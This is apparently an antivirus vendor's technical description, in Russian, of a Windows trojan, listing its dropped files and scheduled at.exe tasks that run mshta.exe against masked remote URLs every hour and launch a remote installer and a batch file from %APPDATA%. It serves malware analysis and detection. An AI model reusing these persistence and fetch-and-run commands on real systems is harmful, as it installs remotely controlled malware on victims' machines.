Техническая информация
- %WINDIR%\Tasks\At3.job
- %WINDIR%\Tasks\At2.job
- %WINDIR%\Tasks\At1.job
- <SYSTEM32>\at.exe 02:58 /every:M,T,W,Th,F,S,Su mshta.exe http://dr####inguins.com/ldsnvod.php?gl######
- <SYSTEM32>\at.exe 03:58 /every:M,T,W,Th,F,S,Su mshta.exe http://dr####inguins.com/ldsnvod.php?gl######
- <SYSTEM32>\at.exe 04:58 /every:M,T,W,Th,F,S,Su mshta.exe http://dr####inguins.com/ldsnvod.php?gl######
- <SYSTEM32>\at.exe 01:58 /every:M,T,W,Th,F,S,Su mshta.exe http://dr####inguins.com/ldsnvod.php?gl######
- <SYSTEM32>\mshta.exe http://re####rererere.com/inst.php?id##########
- <SYSTEM32>\cmd.exe /c ""%APPDATA%\dgfdgsdf.bat" "
- <SYSTEM32>\at.exe 00:58 /every:M,T,W,Th,F,S,Su mshta.exe http://dr####inguins.com/ldsnvod.php?gl######
- %APPDATA%\dgfdgsdf.bat
- %APPDATA%\palladium.exe
- 'localhost':1035
- ClassName: 'Shell_TrayWnd' WindowName: ''